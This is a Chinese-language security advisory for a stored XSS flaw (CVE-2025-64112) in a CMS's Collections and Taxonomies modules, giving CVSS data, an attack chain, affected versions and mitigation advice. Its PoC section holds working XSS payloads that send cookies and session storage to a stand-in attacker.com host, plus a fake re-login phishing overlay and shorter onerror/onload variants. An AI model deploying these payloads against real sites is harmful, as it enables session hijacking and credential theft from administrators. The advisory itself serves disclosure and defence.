CVE-2025-64112 Statematic CMS Collections/Taxonomies存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64112

漏洞类型

存储型XSS

CVSS评分

8.0 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Statematic CMS

漏洞概述

CVE-2025-64112是Statematic CMS（一个基于Laravel和Git的内容管理系统）中发现的严重安全漏洞。该漏洞为存储型跨站脚本攻击（Stored XSS），存在于Collections（集合）和Taxonomies（分类法）功能模块中。攻击者利用此漏洞可以在内容创建过程中注入恶意JavaScript代码，这些恶意代码会被永久存储在服务器端。当具有更高权限的用户（如管理员）访问或查看包含恶意脚本的内容时，攻击者的JavaScript代码将自动执行，可能导致敏感信息窃取、会话劫持、恶意操作执行等严重后果。由于该漏洞需要低权限认证用户即可实施攻击，且攻击成功后可提升权限，因此被评定为高危漏洞，CVSS评分达到8.0分。

技术细节

该存储型XSS漏洞存在于Statematic CMS的内容管理功能中，具体位于Collections和Taxonomies模块。攻击者首先需要拥有有效的账户并具备内容创建权限（低权限要求），然后在创建或编辑集合/分类法时，在输入字段中注入恶意JavaScript代码。由于系统未对用户输入进行充分的输出编码或输入过滤，恶意脚本被直接存储到数据库中。当其他用户（尤其是高权限用户）访问包含该恶意内容的页面时，浏览器会解析并执行注入的JavaScript代码。攻击者可利用此机会窃取用户Cookie、劫持会话、执行任意操作或进行进一步权限提升。根据CVSS向量AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H分析，该漏洞通过网络远程利用，利用复杂度低，但需要用户交互触发，且对机密性、完整性和可用性均造成高影响。

攻击链分析

STEP 1

1. 侦察阶段

攻击者识别目标网站使用Statematic CMS，确定攻击入口点（Collections或Taxonomies功能模块）

STEP 2

2. 初始访问

攻击者获取Statematic CMS的有效账户凭证（可通过社会工程、凭证填充或利用其他低危漏洞获得）

STEP 3

3. 权限验证

确认账户具备内容创建权限（低权限要求），能够访问Collections或Taxonomies管理功能

STEP 4

4. 恶意代码注入

在创建或编辑Collections/Taxonomies时，将包含恶意JavaScript的XSS payload注入到输入字段中，提交后数据存储到数据库

STEP 5

5. 触发阶段

具有更高权限的用户（如管理员）访问或查看包含恶意脚本的内容页面

STEP 6

6. 代码执行

用户浏览器解析页面内容时执行注入的恶意JavaScript代码

STEP 7

7. 恶意活动

根据payload设计，执行敏感信息窃取（Cookie/Token）、会话劫持、钓鱼攻击或进一步权限提升等恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-64112 Stored XSS PoC for Statematic CMS
// Target: Collections or Taxonomies fields
// Required: Authenticated user with content creation permissions

// Example malicious payload for XSS injection
// This payload can be injected into Collection/Taxonomy field names or values

const xssPayload = `
<script>
  // Cookie stealing payload
  fetch('https://attacker.com/steal?cookie=' + document.cookie);
  
  // Session hijacking
  const sessionData = {
    cookies: document.cookie,
    localStorage: localStorage,
    sessionStorage: sessionStorage,
    userAgent: navigator.userAgent
  };
  
  // Send stolen data to attacker server
  fetch('https://attacker.com/exfil', {
    method: 'POST',
    body: JSON.stringify(sessionData),
    headers: {'Content-Type': 'application/json'}
  });
  
  // DOM manipulation for phishing
  document.body.innerHTML += '<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:white;z-index:9999;"><h1>Session Expired - Please Re-login</h1><form action="https://attacker.com/phish"><input name="username"><input name="password" type="password"><button>Submit</button></form></div>';
</script>
`;

// Alternative shorter payload examples:
// <img src=x onerror="fetch('https://attacker.com/?c='+document.cookie)">
// <svg/onload=fetch('https://attacker.com/?d='+btoa(document.domain))>
// <body onload="fetch('https://attacker.com/?s='+sessionStorage.getItem('token'))">

// Steps to exploit:
// 1. Authenticate to Statematic CMS with low-privilege account
// 2. Navigate to Collections or Taxonomies management
// 3. Create new Collection/Taxonomy or edit existing one
// 4. Inject XSS payload into field name or value
// 5. Save the content
// 6. Wait for admin/high-privilege user to view the content
// 7. XSS executes in victim's browser context

影响范围

Statematic CMS < 5.22.1

防御指南

临时缓解措施

立即将Statematic CMS升级到5.22.1版本以修复该漏洞。在升级前，可临时限制内容创建功能的访问权限，仅授权绝对必要的用户，并启用严格的输入验证和输出编码。同时监控日志以检测潜在的利用尝试。对于无法立即升级的系统，建议实施Web应用防火墙（WAF）规则来检测和阻止XSS攻击向量。